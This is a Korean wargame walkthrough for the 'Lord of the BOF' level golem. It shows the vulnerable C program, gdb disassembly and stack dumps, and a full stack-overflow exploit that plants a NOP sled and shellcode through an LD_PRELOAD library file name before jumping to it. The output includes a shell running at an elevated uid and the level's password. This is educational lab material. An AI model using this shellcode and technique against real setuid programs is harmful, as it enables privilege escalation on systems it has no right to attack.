BOF 원정대 – Level 11 (golem)

문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- golem
- stack destroyer
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
 char buffer[40];
 int i;

 if(argc < 2){
 printf(argv error\n);
 exit(0);
 }

 if(argv[1][47] != '\xbf')
 {
 printf(stack is still your friend.\n);
 exit(0);
 }

 strcpy(buffer, argv[1]); 
 printf(%s\n, buffer);

 // stack destroyer!
 memset(buffer, 0, 44);
 memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
}

이번 문제는 일단 버퍼를 다 지운다. 그리고 48번째 값이 0xbf 여야 한다. 이번 문제는 공유 라이브러리 관련 환경변수 값이 있을 경우 스택에 찌꺼기를 남긴다는 점을 이용하여 풀 수 있다.

[skeleton@localhost skeleton]$ cat test.c
#include<stdio.h>
int main(){
 printf(test);
 return 0;
}
[skeleton@localhost skeleton]$ gcc -shared -o `python -c print '\x90'*100 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\xb0\x46\xcd\x80' + '\xd9\xe8\xd9\x74\x24\xf4\x5f\xbd\xb1\x4d\x3c\x4f\x29\xc9\xb1\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2\x44\x27\x37\x17\x3f\xea\x21\xcf\x12\x68\x27\xe8\x04\x41\x44\x9f\xd4\xf5\x85\x3d\xbd\x6b\x53\x22\x6f\x9c\x6b\xa5\x8f\x5c\x43\xc7\xe6\x32\xb4\x74\x90\xca\x9d\x29\xe9\x2a\xec\x4e'` test.c [skeleton@localhost skeleton]$ export LD_PRELOAD=/home/skeleton/`python -c print '\x90'*100 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\xb0\x46\xcd\x80' + '\xd9\xe8\xd9\x74\x24\xf4\x5f\xbd\xb1\x4d\x3c\x4f\x29\xc9\xb1\x0b\x31\x6f\x1a\x03\x6f\x1a\x83\xef\xfc\xe2\x44\x27\x37\x17\x3f\xea\x21\xcf\x12\x68\x27\xe8\x04\x41\x44\x9f\xd4\xf5\x85\x3d\xbd\x6b\x53\x22\x6f\x9c\x6b\xa5\x8f\x5c\x43\xc7\xe6\x32\xb4\x74\x90\xca\x9d\x29\xe9\x2a\xec\x4e'`
[skeleton@localhost skeleton]$ gdb golem_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) disassemble main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %esp,%ebp
0x8048473 <main+3>: sub $0x2c,%esp
0x8048476 <main+6>: cmpl $0x1,0x8(%ebp)
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push $0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add $0x4,%esp
0x8048489 <main+25>: push $0x0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add $0x4,%esp
0x8048493 <main+35>: mov 0xc(%ebp),%eax
0x8048496 <main+38>: add $0x4,%eax
0x8048499 <main+41>: mov (%eax),%edx
0x804849b <main+43>: add $0x2f,%edx
0x804849e <main+46>: cmpb $0xbf,(%edx)
0x80484a1 <main+49>: je 0x80484c0 <main+80>
0x80484a3 <main+51>: push $0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add $0x4,%esp
0x80484b0 <main+64>: push $0x0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add $0x4,%esp
0x80484ba <main+74>: lea 0x0(%esi),%esi
0x80484c0 <main+80>: mov 0xc(%ebp),%eax
0x80484c3 <main+83>: add $0x4,%eax
0x80484c6 <main+86>: mov (%eax),%edx
0x80484c8 <main+88>: push %edx
0x80484c9 <main+89>: lea 0xffffffd8(%ebp),%eax
0x80484cc <main+92>: push %eax
0x80484cd <main+93>: call 0x80483a8 <strcpy>
---Type <return> to continue, or q <return> to quit---
0x80484d2 <main+98>: add $0x8,%esp
0x80484d5 <main+101>: lea 0xffffffd8(%ebp),%eax
0x80484d8 <main+104>: push %eax
0x80484d9 <main+105>: push $0x8048599
0x80484de <main+110>: call 0x8048378 <printf>
0x80484e3 <main+115>: add $0x8,%esp
0x80484e6 <main+118>: push $0x2c
0x80484e8 <main+120>: push $0x0
0x80484ea <main+122>: lea 0xffffffd8(%ebp),%eax
0x80484ed <main+125>: push %eax
0x80484ee <main+126>: call 0x8048398 <memset>
0x80484f3 <main+131>: add $0xc,%esp
0x80484f6 <main+134>: lea 0xffffffd8(%ebp),%eax
0x80484f9 <main+137>: mov $0xbfffffcf,%edx
0x80484fe <main+142>: mov %edx,%ecx
0x8048500 <main+144>: sub %eax,%ecx
0x8048502 <main+146>: mov %ecx,%eax
0x8048504 <main+148>: push %eax
0x8048505 <main+149>: push $0x0
0x8048507 <main+151>: lea 0xffffffd8(%ebp),%eax
0x804850a <main+154>: lea 0x30(%eax),%edx
0x804850d <main+157>: push %edx
0x804850e <main+158>: call 0x8048398 <memset>
0x8048513 <main+163>: add $0xc,%esp
0x8048516 <main+166>: leave 
0x8048517 <main+167>: ret 
0x8048518 <main+168>: nop 
0x8048519 <main+169>: nop 
0x804851a <main+170>: nop 
0x804851b <main+171>: nop 
0x804851c <main+172>: nop 
0x804851d <main+173>: nop 
---Type <return> to continue, or q <return> to quit---
0x804851e <main+174>: nop 
0x804851f <main+175>: nop 
End of assembler dump.
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `python -c print '\xbf'*48`
Starting program: /home/skeleton/golem_tmp `python -c print '\xbf'*48`

Breakpoint 1, 0x8048517 in main ()
(gdb) x/32wx $esp
0xbffffa0c: 0xbfbfbfbf 0x00000000 0x00000000 0x00000000
0xbffffa1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa7c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/32wx $esp-5000
.
.
.
[생략]
.
.
.
0xbffff484: 0x20730007 0xffffffff 0xffffffd0 0x00000000
0xbffff494: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff4a4: 0x00000000 0x00000000 0x00000000 0xbffff9e0
0xbffff4b4: 0x00000004 0x400150a8 0x40013c00 0xbffff520
0xbffff4c4: 0x00000000 0x00000000 0x00000001 0xbffff9d8
0xbffff4d4: 0xbffff9b3 0x0804859b 0x08048599 0x00000031
0xbffff4e4: 0xffffffff 0x080482d0 0x080482d0 0xbffff538
0xbffff4f4: 0x00000002 0x40023fd0 0x40013c00 0x4000ba15
(gdb) 
0xbffff504: 0x40013868 0x40000814 0x400041b0 0x00000001
0xbffff514: 0xbffff520 0x40001528 0x000002c8 0x00000000
0xbffff524: 0x080482d0 0x00000000 0x00000001 0x40000824
0xbffff534: 0x0804859c 0x400075bb 0x40017000 0x00002fb2
0xbffff544: 0x40013868 0x00000000 0x00000000 0x40014498
0xbffff554: 0x6d6f682f 0x6b732f65 0x74656c65 0x902f6e6f
0xbffff564: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff574: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) 
0xbffff584: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff594: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5a4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5b4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5c4: 0x31909090 0xcd31b0c0 0x89c18980 0xcd46b0c3
0xbffff5d4: 0xd9e8d980 0x5ff42474 0x3c4db1bd 0xb1c9294f
0xbffff5e4: 0x1a6f310b 0x831a6f03 0x44e2fcef 0x3f173727
0xbffff5f4: 0x12cf21ea 0x04e82768 0xd49f4441 0xbd3d85f5
(gdb) 
0xbffff604: 0x6f22536b 0x8fa56b9c 0xe6c7435c 0x9074b432
0xbffff614: 0xe9299dca 0x004eec2a 0x40013868 0x4000220c
0xbffff624: 0xbffffb47 0x00000000 0x00000000 0x00000000
0xbffff634: 0x00000000 0x40014a00 0x00000000 0x00000000
0xbffff644: 0x00000000 0x00000000 0x00000006 0x00000000
0xbffff654: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff664: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff674: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) q
The program is running. Exit anyway? (y or n) y
[skeleton@localhost skeleton]$ ./golem `python -c print 'A'*44 + '\x74\xf5\xff\xbf'` 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAt
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ my-pass
euid = 511
cup of coffee
bash$